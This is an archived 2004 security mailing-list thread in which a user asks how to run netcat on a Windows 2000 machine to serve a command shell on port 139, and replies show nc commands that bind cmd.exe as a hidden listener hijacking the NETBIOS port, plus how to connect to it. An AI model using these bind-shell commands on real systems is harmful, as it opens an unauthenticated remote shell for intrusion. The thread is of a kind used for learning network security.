Re: nc help needed.
From: Gautam R. Singh (gautam.singh_at_gmail.com)
Date: 09/25/04
- Previous message: Jari IT: "WuFTP server with Iptables."
- Maybe in reply to: Vijay Kumar: "nc help needed."
- Next in thread: Fields, James: "RE: nc help needed."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 25 Sep 2004 21:08:38 +0530 To: security-basics@securityfocus.com
The -s I believe would be the source
address - the ip address of the m/c from where u are connecting.
192.168.10.14> nc.exe -v -L -d -e cmd.exe -p 139 -s 192.168.10.15
192.168.10.15> telnet 192.168.10.14 139
or
192.168.10.15> nc -v 192.168.10.14 139
Try to use a different port and see if it is working. If it does,then use 139.
~gautam
On Fri, 24 Sep 2004 18:56:59 +0530, Vijay Kumar <vijay@calsoftinc.com> wrote:
> Hi,
>
> Thanks a ton for all the replies. I know that Netbios is using port 139.
> Since the Windows computer is currently accepting null sessions, we
> should be able to connect to this port via netcat. ( am i right ? )
> Have been reading these lines from the documentation, which talks about
> assigning proirity to the netcat session we are trying to establish.
> Hence I am sure this should work, we are mising on something.
> Does anyone has anything to add ?
> Also I am not understanding whether the -s <ip address> should be the
> computer running netcat or the detination (target) machine ?
>
> "" You will need to bind "in front of" some services that may already be
> listening on those ports. An example is the NETBIOS Session Service
> that is running on port 139 of NT machines that are sharing files. You
> need to bind to a specific source address (one of the IP addresses of
> the machine) to accomplish this. This gives Netcat priority over the
> NETBIOS service which is at a lower priority because it is bound to ANY
> IP address. This is done with the Netcat -s option:
>
> nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
>
> Now you can connect to the machine on port 139 and Netcat will field
> the connection before NETBIOS does. You have effectively shut off
> file sharing on this machine by the way. You have done this with just
> user privileges to boot. ""
>
> Have not used psexec -> will try it.
>
> Regards
> Vijay.
>
> On Fri, 2004-09-24 at 17:55, Scream wrote:
> > using the -p 139 command line switch would attempt to bind to port 139 on
> > the machine you are running it on which being a windows machine is already
> > in use..
> >
> >
> > If you are trying to connect to the remote then it would be , this however
> > will not spawn a cmd session.
> >
> > nc -v ip addr 139
> >
> >
> > ----- Original Message -----
> > From: "Vijay Kumar" <vijay@calsoftinc.com>
> > To: <security-basics@securityfocus.com>
> > Sent: Thursday, September 23, 2004 11:21 AM
> > Subject: nc help needed.
> >
> >
> > > Hi,
> > >
> > > Trying to use the nc command from a windows 2k box :
> > >
> > > nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
> > >
> > > The error given is : Can't grab xxx.xxx.xxx.xxx:139 with bind.
> > >
> > > s -> destination host where the null sessions on 139 are accepted.
> > >
> > > Any clue, how to to get the cmd working on the remote host ?
> > >
> > > Regards,
> > > Vijay.
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > --------------------------------------------------------------------------
> > -
> > > Computer Forensics Training at the InfoSec Institute. All of our class
> > sizes
> > > are guaranteed to be 12 students or less to facilitate one-on-one
> > > interaction with one of our expert instructors. Gain the in-demand skills
> > of
> > > a certified computer examiner, learn to recover trace data left behind by
> > > fraud, theft, and cybercrime perpetrators. Discover the source of computer
> > > crime and abuse so that it never happens again.
> > >
> > > http://www.infosecinstitute.com/courses/computer_forensics_training.html
> > > --------------------------------------------------------------------------
> > --
> > >
>
>
>
>
> ---------------------------------------------------------------------------
> Computer Forensics Training at the InfoSec Institute. All of our class sizes
> are guaranteed to be 12 students or less to facilitate one-on-one
> interaction with one of our expert instructors. Gain the in-demand skills of
> a certified computer examiner, learn to recover trace data left behind by
> fraud, theft, and cybercrime perpetrators. Discover the source of computer
> crime and abuse so that it never happens again.
>
> http://www.infosecinstitute.com/courses/computer_forensics_training.html
> ----------------------------------------------------------------------------
>
>
-- Gautam R. Singh PGP Key: http://gautam.techwhack.com/key/ NOTE: The information contained in this message is confidential and intended only for the use of the individual or entity identified. If the reader of this message is not the intended recipient, any dissemination, distribution or copying of the information in this message is strictly prohibited. If you have received this message by error, please notify the sender immediately. -- Gautam R. Singh PGP Key: http://gautam.techwhack.com/key/ NOTE: The information contained in this message is confidential and intended only for the use of the individual or entity identified. If the reader of this message is not the intended recipient, any dissemination, distribution or copying of the information in this message is strictly prohibited. If you have received this message by error, please notify the sender immediately.
- Previous message: Jari IT: "WuFTP server with Iptables."
- Maybe in reply to: Vijay Kumar: "nc help needed."
- Next in thread: Fields, James: "RE: nc help needed."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
